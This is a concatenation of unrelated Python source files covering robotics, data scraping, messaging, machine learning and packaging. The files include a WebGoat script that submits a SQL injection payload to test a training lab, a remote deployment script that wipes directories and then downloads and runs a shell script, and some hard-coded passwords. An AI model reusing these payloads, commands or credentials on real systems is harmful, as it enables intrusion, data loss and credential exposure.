time.sleep(0.5)
body = 6000
bodyFlag = False
tango.setTarget(TURN, 6000)
tango.setTarget(BODY, 6000)
tango.setTarget(HEADTURN, 6000)
def centerScreen(xabs, yabs, xdist, ydist):
if((xabs > 60) or (yabs > 50)):
xdist = xdist + int(xdist*.3)
ydist = ydist + int(ydist*.3)
tango.setTarget(HEADTURN, 6000 + (xdist*2))
tango.setTarget(HEADTILT, 6000 + (int(ydist*2.5)))
elif((xabs < 60) and (yabs > 50)):
return True
return False
def startTimer():
global start_time
start_time = time.time()
def checkTimer(time_bool):
global start_time, time_flag, findHumanFlag, bodyFlag, distFlag
if(time_bool):
if(time.time() - start_time > 8):
findHumanFlag = True
bodyFlag = True
distFlag = True
else:
start_time = 0
time_flag = True
nextSearchPosition()
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# grab the raw NumPy array representing the image
image = frame.array
face_cascade = cv2.CascadeClassifier('data/haarcascades/haarcascade_frontalface_default.xml')
faces = face_cascade.detectMultiScale(image, 1.3, 4)
if(len(faces) != 0):
if(findHumanFlag):
client.client.sendData("Hello Human")
findHumanFlag = False
checkTimer(False)
x,y,w,h = faces[0]
cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)
xcenter = x + int((w/2))
ycenter = y + int((h/2))
xdist = 320 - xcenter
ydist = 240 - ycenter
xabs = abs(320 - xcenter)
yabs = abs(240 - ycenter)
if(bodyFlag):
centerBody(xabs, yabs, xdist)
else:
centerScreen(xabs, yabs, xdist, ydist)
if(distFlag):
if(w*h < 19000 or w*h > 24000):
if(w*h < 19000): #move forwwards
temp = (19000-w*h) / 5800
motors = 5200
tango.setTarget(MOTORS, motors)
time.sleep(temp)
elif(w*h > 24000): #move backwards
temp = (w*h-24000)/50000
motors = 6900
tango.setTarget(MOTORS, motors)
time.sleep(temp)
distFlag = False
motors = 6000
tango.setTarget(MOTORS, motors)
if(centerScreen(xabs, yabs, xdist, ydist)):
print("Found you human")
else:
if(time_flag):
startTimer()
time_flag = False
else:
checkTimer(True)
if(findHumanFlag):
nextSearchPosition()
cv2.imshow("Robo", image)
key = cv2.waitKey(1) & 0xFF
#stop()
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
# if the `q` key was pressed, break from the loop
if key == ord("q"):
shutdown()
break
|
983,731 | e0a2daeb693b45665e2016df8889803524136df3 | from Creature import Creature
class Human(Creature):
def __init__(self, name, thing_property, gender, ability_to_die):
Creature.__init__(self, name, thing_property, ability_to_die)
self.gender = gender
def __str__(self):
print('Your name is %s,Can you think of?%s,what your gender %s,can your die %S' % (self.name, self.ability_to_die, self.gender, self.property_die)) |
983,732 | 5567103072085803fff5ce9a586f2754ae0884b4 | #!/bin/env python3
"""Demo function to show how to use Monpyou."""
from monpyou import MonpYou
from monpyou.const import __version__
import argparse
import logging
def main(username: str, password: str):
"""Interaction with the MonpYou class."""
print("Monpyou version "+__version__)
mpy = MonpYou(username, password)
mpy.update_accounts()
for account in mpy.accounts:
print("{} ({}): {} {}".format(account.name, account.iban, account.balance, account.currency))
if __name__ == '__main__':
"""simple command line wrapper.
- Reads username/password as argument
- sets loglevel
- calls main function
"""
parser = argparse.ArgumentParser()
parser.add_argument('username')
parser.add_argument('password')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
main(args.username, args.password)
|
983,733 | a5572dc9b12709756e4b6ef5349d5e9e85089dac | __author__ = 'pythonspot.com'
x = 1
y = 1.234
z = True
print(x)
print(y)
print(z)
|
983,734 | b95742bde07453958438e8e8c709fbee8401fcba |
from setuptools import setup, find_packages
#from beamshapes.version import __version__
version_number = {}
with open("beamshapes/version.py") as fp:
exec(fp.read(), version_number)
# link to test upload and fresh install on Test PyPi https://packaging.python.org/guides/using-testpypi/
setup(name='beamshapes',
version=version_number['__version__'],
description='Acoustic beamshape modelling for various sources',
long_description=open('README.md').read(),
long_description_content_type="text/markdown",
url='https://github.com/thejasvibr/bat_beamshapes.git',
author='Thejasvi Beleyur',
author_email='thejasvib@gmail.com',
license='MIT',
install_requires=['joblib','numpy','sympy','mpmath',
'scipy','matplotlib','tqdm'],
packages=find_packages(),
zip_safe=False,
include_package_data=True,
classifiers=[
'Intended Audience :: Science/Research',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Programming Language :: Python :: 3'
]) |
983,735 | 4c4e3be2cf80383db43c189667ee5b34a5178598 | import socket
import select
from gamelogic import Account
import logging
class TcpServer(object):
def __init__(self, config):
self.logger = logging.getLogger("TcpServer")
self.logger.setLevel(logging.DEBUG)
self._host = config.get("host", None)
self._port = config.get("port", None)
self._listen_socket = None
self._connections = {}
self._need_read_sockets = []
self._need_write_sockets = []
def start(self):
self._listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._listen_socket.setblocking(False)
self._listen_socket.bind((self._host, self._port))
self._listen_socket.listen(100)
self._need_read_sockets.append(self._listen_socket)
def run(self):
self.logger.info("Server Start")
while True:
in_sockets, out_sockets, error_sockets = select.select(self._need_read_sockets, self._need_write_sockets, self._need_read_sockets, 0.1)
for obj in error_sockets:
self.logger.error("error socket:%s", obj)
conn = self._connections.get(obj, None)
if conn:
conn.close_connection()
for obj in in_sockets:
if obj == self._listen_socket:
self.new_client()
conn = self._connections.get(obj, None)
if conn:
conn.handle_read_event()
for obj in out_sockets:
conn = self._connections.get(obj, None)
if conn:
conn.handle_write_event()
def new_client(self):
client_socket, client_addr = self._listen_socket.accept()
client_socket.setblocking(False)
conn = Account.Account(self, client_socket)
self._connections[client_socket] = conn
self.logger.info("new client %s fd(%s)", client_socket.getpeername(), client_socket.fileno())
def remove_connection(self, socket_obj):
self._connections.pop(socket_obj)
def add_read_need(self, socket_obj):
self._need_read_sockets.append(socket_obj)
def remove_read_need(self, socket_obj):
self._need_read_sockets.remove(socket_obj)
def add_write_need(self, socket_obj):
self._need_write_sockets.append(socket_obj)
def remove_write_need(self, socket_obj):
self._need_write_sockets.remove(socket_obj)
|
983,736 | dfb1620d8198a2d9cfdf1739eeb761cc3a65123f | '''
def outer(func):
print('1...')
def inner():
print('2...')
func()
print('3...')
return inner
@outer
def save():
print('do save...')
'''
'''
save头部加@outer,python解析器做了哪些事?
save = outer(save)
'''
'''
多个装饰器顺序。
先开始,后结束
'''
#定义函数:完成包裹数据
def makeBold(fn):
def wrapped():
return "<b>" + fn() + "</b>"
#return 'xx'
return wrapped
#定义函数:完成包裹数据
def makeItalic(fn):
def wrapped():
return "<i>" + fn() + "</i>"
return wrapped
@makeBold
def test1():
return "hello world-1"
@makeItalic
def test2():
return "hello world-2"
@makeBold
@makeItalic
def test3():
return "hello world-3"
print(test1())
print(test2())
print('***************************************华丽的分割线***************************************')
print(test3())
|
983,737 | f7e4cd26caa5021001e0daa6291aea38e3b0914e | """ This api readers the headers in the request and determines the IP"""
|
983,738 | 8bb26b6ebc40e5a995168e0cda62e51dd43ec5ec | import pika
import json
credentials = pika.PlainCredentials('TestUser', '1234') # mq用户名和密码
# 虚拟队列需要指定参数 virtual_host,如果是默认的可以不填。
connection = pika.BlockingConnection(pika.ConnectionParameters(host = '127.0.0.1',port = 5672,virtual_host = '/',credentials = credentials))
channel=connection.channel()
# 声明exchange,由exchange指定消息在哪个队列传递,如不存在,则创建。durable = True 代表exchange持久化存储,False 非持久化存储
channel.exchange_declare(exchange = 'python-test-direct',durable = True, exchange_type='direct')
for i in range(10):
message=json.dumps({'OrderId':"1000%s"%i})
# 指定 routing_key。delivery_mode = 2 声明消息在队列中持久化,delivery_mod = 1 消息非持久化
channel.basic_publish(exchange = 'python-test-direct',routing_key = 'OrderId',body = message,
properties=pika.BasicProperties(delivery_mode = 2))
print(message)
connection.close() |
983,739 | 174fcea0558a0cc2b7d62cba5d571a63241ae1dd | # Copyright 2019 Google LLC.
"""Tracks the cursor in a video.
Given a template image for a cursor, adds a stream containing coordinates of the
cursor in the video.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from video_processing import stream_processor
import cv2
class CursorTracker(stream_processor.ProcessorBase):
"""Processor tracking cursor in the video."""
def __init__(self, configuration):
self._video_stream_name = configuration.get('video_stream_name', 'video')
self._cursor_stream_name = configuration.get('cursor_stream_name', 'cursor')
self._background_stream_name = configuration.get('background_stream_name',
'background_image')
self._cursor_file = configuration.get('cursor_template_file', '')
self._background_image = None
self._cursor_threshold = 0
self._cursor_width = 0
self._cursor_height = 0
self._cursor_log = []
def open(self, stream_set):
self._cursor_template = cv2.imread(self._cursor_file, 0)
self._cursor_width, self._cursor_height = self._cursor_template.shape[::-1]
stream_set.stream_headers[
self._cursor_stream_name] = stream_processor.StreamHeader(
frame_data_type=str,
header_data=stream_processor.CursorStreamHeader(
self._cursor_file, self._cursor_width, self._cursor_height,
self._cursor_log, self._cursor_template))
return stream_set
def process(self, frame_set):
if (frame_set.get(self._background_stream_name, False) and
self._background_image is None):
self._background_image = cv2.cvtColor(
frame_set[self._background_stream_name].data, cv2.COLOR_BGR2GRAY)
if frame_set.get(self._video_stream_name, False):
frame_index = frame_set[self._video_stream_name].index
video_frame = frame_set[self._video_stream_name].data
gray_frame = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
if self._background_image is None:
print('ERROR: No valid background image found.')
frame = cv2.subtract(gray_frame, self._background_image)
match = cv2.matchTemplate(frame, self._cursor_template, cv2.TM_CCOEFF)
_, max_val, _, max_loc = cv2.minMaxLoc(match)
# max_loc is best match when using TM_CCOEFF method
#bottom_right = (max_loc[0] + self._cursor_width,
# max_loc[1] + self._cursor_height)
if max_val > self._cursor_threshold:
frame_set[self._cursor_stream_name] = stream_processor.Frame(
frame_index, [
int(max_loc[0] + self._cursor_width / 2),
int(max_loc[1] + self._cursor_height / 2)
])
return frame_set
def close(self):
return []
|
983,740 | b9bd2b59a9addaca1e53c506847987c82d6b1698 | from setuptools import setup, find_packages
with open('requirements.txt', 'r') as f:
required = f.read().splitlines()
# pkgs = find_packages()
# print(f"found packages: {pkgs}")
setup(name='luxmeters', version='0.1.0', author='Martin Maslyankov', author_email='m.maslyankov@me.com',
# packages=pkgs,
packages=['luxmeters'],
install_requires=required,
# scripts=[],
url='http://pypi.python.org/pypi/luxmeters/',
license='LICENSE.txt',
description='A package giving you interface for several luxmeter devices',
long_description=open('README.txt').read(),
)
|
983,741 | 4213d53acd9a78e5698052ed3ac4f3b1be352d7b | # -*- coding: utf-8 -*-
"""
Client Op
Created on Sat Jul 20 14:26:14 2019
gets credectials from cred.py and password
takes search terms and sends requests to mendeley
exports returned objects to storage.
@author: vince
"""
# Import libraries
import cred
from mendeley import Mendeley
def startSession():
'''
Initializes credential flow and returns session object for search
'''
credentials = cred.getCred()
client_id = credentials['client_id']
client_secret = credentials['client_secret']
mendeley = Mendeley(client_id, client_secret=client_secret)
auth = mendeley.start_client_credentials_flow()
session = auth.authenticate()
print('Session open command sent')
return session
def closeSession(session):
session.close()
print('Close session command sent')
if __name__ == "__main__":
mendeley_session = startSession()
print(type(mendeley_session))
|
983,742 | 2e4a0eaa572ad3d437a15371ba6bf2f994c2ae93 | import tensorflow as tf
import numpy as np
x_data = np.float32(np.random.rand(1,100))
y_data = np.dot([0.1],x_data)+0.3
# 构造一个线性方程
W = tf.Variable(tf.random_uniform([1],-1.0,1.0))
b = tf.Variable(tf.random_uniform([1],-1.0,1.0))
hypothesis = W*x_data +b
# 最小化方差
cost = tf.reduce_mean(tf.square(hypothesis-y_data))
a=tf.Variable(0.5)
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost)
# 初始化参数
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(4001):
sess.run(train)
if step % 20 == 0:
print(step,sess.run(cost),sess.run(W),sess.run(b))
|
983,743 | 038ee7c144f70094a60a16097e40626a2c75109e | import os
from dotenv import load_dotenv
load_dotenv() # Load env variables
SECRET_KEY = os.getenv(
'SECRET_KEY', '+y6bxh9b)msc$6@k))6f@p^-ely9k#nfqcoidncb2#knf%%!@l'
)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'graphene_django',
'django_filters',
'corsheaders',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'swapi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'swapi.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.getenv('POSTGRES_DB', ''),
'USER': os.getenv('POSTGRES_USER', ''),
'PASSWORD': os.getenv('POSTGRES_PASSWORD', ''),
'HOST': os.getenv('POSTGRES_HOST', ''),
'PORT': os.getenv('POSTGRES_PORT', ''),
'ATOMIC_REQUESTS': True
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation'
'.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation'
'.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation'
'.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation'
'.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en'
TIME_ZONE = os.getenv('TZ', 'America/Bogota')
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
CORS_ORIGIN_ALLOW_ALL = True
|
983,744 | a1136fb7d08e484036a70b807692f31c5977aae1 | try:
import neuroglancer
except:
pass
def ngLayer(data,res,oo=[0,0,0],tt='segmentation'):
# input zyx -> display xyz
dim = neuroglancer.CoordinateSpace(names=['x', 'y', 'z'],
units='nm',
scales=res)
return neuroglancer.LocalVolume(data.transpose([2,1,0]),volume_type=tt,dimensions=dim,voxel_offset=oo)
|
983,745 | 252dd0b529e714917fc1a808bd38119b79fe6c32 | from pssh.clients import ParallelSSHClient
from pssh.clients import SSHClient
import time
# init params, write down servers IPs below
hosts = []
amount_of_nodes_per_host = 10
spam_duration_seconds = 5
# 1 - Preparing nodes
command = "rm -rf * && wget https://raw.githubusercontent.com/tonymorony/komodo-cctools-python/master/scripts/dexp2p/multi-server/prepare_dexp2p_node_ms.sh " \
"&& chmod u+x prepare_dexp2p_node_ms.sh && ./prepare_dexp2p_node_ms.sh"
client = ParallelSSHClient(hosts, user="root")
output = client.run_command(command, sudo=True)
for node in output:
for line in output[node]['stdout']:
print(line)
# 2 - Preparing "started nodes" file on each server
i = 0
for host in hosts:
print("Preparing file on node " + str(i+1))
non_parallel_client = SSHClient(host, user="root")
if i == 0:
non_parallel_client.run_command("touch ip_list")
else:
line_with_hosts = ""
for host in hosts[:i]:
line_with_hosts += host + "\n"
non_parallel_client.run_command("echo -e " + line_with_hosts + " >> ip_list")
i = i + 1
print("Test nodes software prepared. Starting network.")
# 3 - Starting network (need to do one by one)
i = 0
for host in hosts:
print("Starting network on node " + str(i+1))
non_parallel_client = SSHClient(host, user="root")
if i == 0:
is_first_env = "export IS_FIRST=True"
else:
is_first_env = "export IS_FIRST=False"
ip_env = "NODE_IP=" + host
network_start_command = "export NODESAMOUNT=" + str(amount_of_nodes_per_host) + " && " + is_first_env \
+ " && " + ip_env + " && " + "python3 clients_spawn_multi_server.py"
output = non_parallel_client.run_command(network_start_command, sudo=True)
time.sleep(3 * amount_of_nodes_per_host + 3)
i = i + 1
print("Network setup completed. Starting to spam.")
# 3 - Starting spam
for host in hosts:
non_parallel_client = SSHClient(host, user="root")
output = non_parallel_client.run_command("export NODESAMOUNT=" + str(amount_of_nodes_per_host) + " && ./dexp2p_start_spam_ms.sh " + host + " " + str(spam_duration_seconds), sudo=True)
time.sleep(spam_duration_seconds)
# 4 - Collecting results
print("Spam is finished. Collecting results")
client = ParallelSSHClient(hosts, user="root")
output = client.run_command("export NODESAMOUNT=" + str(amount_of_nodes_per_host) + " && python3 get_stats.py", sudo=True)
for node in output:
for line in output[node]['stdout']:
print(line)
|
983,746 | 0b144352a1a4096b6c8d830323a05f6533fb203d | n = list(map(int,input()))
if sum(n)/9 == sum(n)//9:
print("Yes")
else:
print("No")
|
983,747 | 45c222560ebba25d370a1f43f796d665ec7a79a8 |
import sys
import os
import random
import csv
import tensorflow as tf
import numpy as np
from PIL import Image
import cv2
FAC_DATA = 'fac_data'
IMAGE_DIR = 'Images'
AU_DIR = 'AUs'
BUFFER_SIZE = 50
TRAINING_PERCENT = 70
TESTING_PERCENT = (100 - TRAINING_PERCENT) / 2.0
VALIDATION_PERCENT = (100 - TRAINING_PERCENT) / 2.0
AUS = [1,2,4,5,6,9,12,15,17,20,25,26]
TRAINING_DIR = 'training'
TESTING_DIR = 'testing'
VALIDATION_DIR = 'validation'
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_feature(value):
return tf.train.Feature(bytes_list=tf.train.FloatList(value=value))
def write_records(root_dir, dest_dir):
print("Beginning writing")
#Images divided into subjects, so loop over those dirs
images_dir = os.path.join(root_dir, IMAGE_DIR)
if not os.path.isdir(images_dir):
raise ValueError("There is no 'Images' directory in the specified dataset directory")
for subj in sorted(os.listdir(images_dir)):
print("Processing subject:%s" % subj)
#Subject image dirs have same name as csv files...
subj_image_dir = os.path.join(images_dir, subj)
subject_csv_file = os.path.join(root_dir, AU_DIR, subj)
subject_ptr = open(subject_csv_file)
#Read in the CSV
labels = _get_labels_for_subject(subject_ptr)
#then for every image per subject read it in
for i, filename in enumerate(sorted(os.listdir(subj_image_dir))):
print("Processing %s" % filename)
#Load the image
file_path = os.path.join(subj_image_dir, filename)
frame = int(filename.split('_')[2][:-4])
image = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)
location = TRAINING_DIR
rand = random.random() * 100
if rand > TRAINING_PERCENT + VALIDATION_PERCENT:
location = VALIDATION_DIR
elif rand > TRAINING_PERCENT:
location = TESTING_DIR
#Write to tfrecord
record_path = os.path.join(dest_dir, location, filename + '.tfrecord')
print("Writing %s" % record_path)
writer = tf.python_io.TFRecordWriter(record_path)
example = tf.train.Example(features=tf.train.Features(feature={
'label': _int64_feature(labels[i]),
'image': _bytes_feature(image.tostring())
}))
writer.write(example.SerializeToString())
writer.close()
def _get_labels_for_subject(file_ptr):
""" Reads the CSV file and organizes it into a list
:param file_ptr: pointer to a subject's csv
:type file_ptr: file pointer
:returns: list of FACLabel objects
"""
labels = []
#Open CSC
reader = csv.reader(file_ptr, delimiter=',')
for i, row in enumerate(reader):
facs = []
for j, intensity in enumerate(row):
if j == 0:
continue
facs.append(int(intensity))
labels.append(facs)
return labels
def main():
# params:
# root_dir: The root directory of the dataset to be converted
# dest_dir: The destination directory for the dataset
root_dir = sys.argv[1]
dest_dir = sys.argv[2]
write_records(root_dir, dest_dir)
if __name__ == '__main__':
main() |
983,748 | 920379f922f03ec9e8a11c11922e541a5bda9e50 | from twitchAPI.twitch import Twitch
from twitch import TwitchClient
import requests
import pandas as pd
import json
import sched, time
import psycopg2
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import subprocess
##twitch api input variables
client_ID = ''
secret = ''
#create instance of twitch API
twitch = Twitch(client_ID, secret)
twitch.authenticate_app([])
client = TwitchClient(client_ID)
####establish connection
db_string = "postgres://postgres:PW@localhost:5432/twitch_project"
db = create_engine(db_string, pool_pre_ping=True)
session = sessionmaker(bind=db)()
##write to games tables, write to views table
while True:
time.sleep(600)
curr_time = []
name = []
game_viewers = []
times = []
query = []
i = 0
games = client.games.get_top(100)
curr_time = time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())
while i < 99:
query = 'INSERT INTO views (game_id,viewers,game_name,time) VALUES (' + str(games[i]['game']['id']) + ',' + ((str([games[i]['viewers']])).replace('[','')).replace(']','') +',' + '\'' + str(games[i]['game']['name']).replace('\'','') + '\'' + ',' + 'NOW()' +')'
#print(query)
#send viewership information straight to views table
session.connection().connection.set_isolation_level(0)
session.execute(query)
session.connection().connection.set_isolation_level(1)
#df_viewers = df_viewers.append(pd.DataFrame({"game_name":[games[i]['game']['name']],"viewers":[games[i]['viewers']],"time":[curr_time]}), ignore_index=True, sort=False)
i+=1
|
983,749 | 5b370662bea2535818199952677c2b0d9c2e734e | import requests
import re
# Request session object
s = requests.Session()
s.stream = True
# --[STEP 00 ]--
# Request login page
url = "http://127.0.0.1:8080/WebGoat/login.mvc"
first = s.get(url)
# --[ STEP 01 ]--
# Log into WebGoat
url2 = "http://127.0.0.1:8080/WebGoat/j_spring_security_check"
payload = {'username':'webgoat','password':'webgoat'}
login = s.post(url2, data=payload)
# --[ STEP 02 ]--
# Figure out which menu item is "Http Basics"
# --[ STEP 3 ]--
# Request the lesson for General => Http Basics
lessonurlb = "http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc"
lessonurl = "http://127.0.0.1:8080/WebGoat/attack?Screen=32&menu=1100"
lesson = s.get(lessonurl)
lessonb = s.get(lessonurlb)
found = False
exploit = {}
screennum = 0
for i,j in enumerate(lessonb.json()):
for a,b in j.items():
if (type(b) is unicode and b == "Injection Flaws"):
found = True
if (found == True and type(b) is list):
for lista in b:
for c,d in lista.items():
if (type(c) is unicode and d == "LAB: SQL Injection"):
exploit = lista
break
found = False
if (found):
break
# Simple regex
reg = re.compile(u'attack\?Screen=([\d]+)')
screen_str = ""
for n, v in exploit.items():
if (type(v) is list):
for li in v:
if type(li) is dict:
for key, val in li.items():
if (key == "link"):
screen_str = val
screen_list = re.findall(reg, screen_str)
screen_num = screen_list[0]
# --[ STEP 4 ]--
# Submit the attack to the General => Http Basics page
#ATTACK=`echo -n "1"`
attack_url = "http://127.0.0.1:8080/WebGoat/start.mvc"
att = s.get(attack_url)
attack_url2 = "http://127.0.0.1:8080/WebGoat/attack?Screen=" + str(screen_num) + "&menu=1100"
att_pay = {'employee_id':'112','password':"smith' OR '1' = '1"}
att_login = s.post(attack_url2, data=att_pay)
isStage1 = False
verify = False
listb = exploit.items()
for child in listb[-2][1]:
for ele,ele2 in child.items():
if (ele2 == "Stage 1: String SQL Injection"):
isStage1 = True
if (ele == "complete" and ele2 == True):
verify = True
if (isStage1):
break
# Purposefully fail for testing purposes
#ATTACK=`echo -n "1"`
# --[ STEP 6 ]--
# Set the correct exit code
# It will return a
# - 0 (error) if the vulnerability is present
# - 1 (success) if the vulnerability is fixed (aka not present)
if (verify):
print "Attack Successful"
exit(0)
else:
print "vuln-15 not present"
exit(1)
|
983,750 | dc687d4a9f57444e78a714d9c0c075ebed061280 | from elasticsearch import Elasticsearch
class ES:
def __init__(self):
self.hosts = ["https://f2ff43d409574698a747eaa43256d1e0.northamerica-northeast1.gcp.elastic-cloud.com:9243/"]
self.cloud_id = ""
self.index = "hw5"
self.es = Elasticsearch(hosts=self.hosts, timeout=60, clould_id=self.cloud_id, http_auth=('elastic', 'nRGUXlzD1f8kOT63iLehSG9a'))
self.qrel = {"151901": {}, "151902": {}, "151903": {}}
self.qrel_raw = {"151901": {}, "151902": {}, "151903": {}}
self.qrel_temp = {}
self.rank_list = {"151901": [], "151902": [], "151903": []}
self.query = ["College of Cardinals", "Ten Commandments", "Recent Popes"]
self.query_id = ["151901", "151902", "151903"]
def get_qrel(self):
temp = self.es.search(index=self.index,
body={
"query": {
"match_all": {}
}
})['hits']['hits']
for item in temp:
key = item['_id']
value = item['_source']['relevance']
self.qrel_temp[key] = value
def get_rank_list(self):
for idx, q in enumerate(self.query):
print("Reading ranked list: " + str(idx+1))
q_id = self.query_id[idx]
temp = self.es.search(index="hw3",
body={
"size": 1200,
"query": {
"match": {
"text_content": q
}
},
"_source": ""
})['hits']['hits']
for item in temp:
self.rank_list[q_id].append({item['_id']: item['_score']})
# i = 0
# for item in temp:
# if i <= 200:
# if item['_id'] in self.qrel[q_id]:
# self.rank_list[q_id].append({item['_id']: item['_score']})
# i += 1
# else:
# self.rank_list[q_id].append({item['_id']: item['_score']})
def output_qrel(self):
for q_id in self.query_id:
record = "Yiyun_Zhu, " + q_id
for key in self.qrel_temp[record]:
s1 = self.qrel_temp[record][key]
s2 = self.qrel_temp["Zhuocheng_Lin,+" + q_id][key]
s3 = self.qrel_temp["Jiayi_Liu, " + q_id][key]
final_s = (s1 + s2 + s3) / 3
self.qrel_raw[q_id][key] = final_s
if final_s < 1:
self.qrel[q_id][key] = 0
else:
self.qrel[q_id][key] = 1
with open("./data/qrel.txt", "a", encoding="utf-8") as f:
for q_id in self.qrel:
for doc in self.qrel[q_id]:
rel = self.qrel[q_id][doc]
line = "{0} 0 {1} {2}\n".format(q_id, doc, rel)
f.write(line)
with open("./data/qrel_raw.txt", "a", encoding="utf-8") as f:
for q_id in self.qrel_raw:
for doc in self.qrel_raw[q_id]:
rel = self.qrel_raw[q_id][doc]
line = "{0} 0 {1} {2}\n".format(q_id, doc, rel)
f.write(line)
def output_rank_list(self):
with open("./data/ranked_list.txt", "a", encoding="utf-8") as f:
for q_id in self.rank_list:
for idx, item in enumerate(self.rank_list[q_id]):
for url in item:
line = '{0} Q0 {1} {2} {3} Exp\n'.format(q_id, url, idx+1, str(item[url]))
f.write(line)
my_es = ES()
my_es.get_qrel()
my_es.output_qrel()
my_es.get_rank_list()
my_es.output_rank_list()
|
983,751 | 9069221a0641fae6337481c033db5863fa20e4d9 | tot = 0
ind = 0
while True:
try:
s = input()
ind += 1
n = int(input())
tot += n
except:
print("%.1f" % (tot/ind))
break
|
983,752 | d470cdc6c627350b3917ec6bb16e5a88e9220761 | #!flask/bin/python
# Copyright 2020 Luis Blazquez Miñambres (@luisblazquezm), Miguel Cabezas Puerto (@MiguelCabezasPuerto), Óscar Sánchez Juanes (@oscarsanchezj) and Francisco Pinto-Santos (@gandalfran)
# See LICENSE for details.
from flask_restx import Api
api = Api(version='1.0',
title='SOA final project',
description="**SOA project's Flask RESTX API**") |
983,753 | 477c52cc7858d93819d3ecf6c6db21c30eca922c | from googleapiclient import discovery
from pprint import pprint
from project_deletion import variable
class projectdeletion:
def project_deletion(self):
service = discovery.build('cloudresourcemanager', 'v1', credentials=variable.credentials)
request = service.projects().delete(projectId=variable.projectid)
request.execute()
pprint("Project has been shutdown now and it will get deleted after 30days")
|
983,754 | 800023217232eaa1c88819da6ed616d1999be948 | # Generated by Django 2.1.7 on 2019-02-21 22:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField(help_text='Text of the article')),
('date', models.DateField(auto_now_add=True, help_text='Date when article was published')),
],
),
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
],
options={
'ordering': ['last_name', 'first_name'],
},
),
migrations.CreateModel(
name='Journal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='Enter a journal name (e.g. Science Fiction)', max_length=200)),
],
),
migrations.AddField(
model_name='article',
name='author',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='catalog.Author'),
),
migrations.AddField(
model_name='article',
name='journal',
field=models.ManyToManyField(help_text='Journal in which the article is published', to='catalog.Journal'),
),
]
|
983,755 | 70b5d1b2c567503d958423c77fbc975731c15fc9 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 29 12:49:50 2018
@author: Ruman
También es posible procesar cadenas que representen un documento
XML usando el método fromstring,
que toma como argumento la cadena que representa el documento XML
"""
from xml.etree import ElementTree as ET
cadena = '''
<catalogo>
<Libro isbn="1111">
<titulo>El quijote</titulo>
<autor>Cervantes</autor>
<precio>1200</precio>
</Libro>
<Libro isbn="2222">
<titulo>El si de las Niñas</titulo>
<autor>Fernando de Rojas</autor>
<precio>1800</precio>
</Libro>
<Libro isbn="3333">
<titulo>Historia de una escalera</titulo>
<autor>Buero vallejo</autor>
<precio>200</precio>
</Libro>
</catalogo>
'''
#Esto devuelve un <Element 'catalogo' at 0x117deea98>
doc=ET.fromstring(cadena)
for nodo in doc.findall("Libro"):
#devuelve todas las apariciones, pero no sus hijos.
print (nodo.tag, nodo.attrib) |
983,756 | 72f058595b4689d9e57527321f17102d5f685e22 | from pydy import *
from sympy import symbols, S, Symbol, Function, sin, cos, tan, Matrix, eye, \
Rational, pprint, trigsimp, expand
N = NewtonianReferenceFrame('N')
q, qd = N.declare_coords('q', 6)
q1, q2, q3, q4, q5, q6 = q
q1p, q2p, q3p, q4p, q5p, q6p = qd
A = N.rotate('A', 3, q1)
B = A.rotate('B', 1, q2)
C = B.rotate('C', 2, q3)
zero = Vector({})
def test_Mul_order():
e1 = UnitVector(A, 1)
e2 = UnitVector(A, 2)
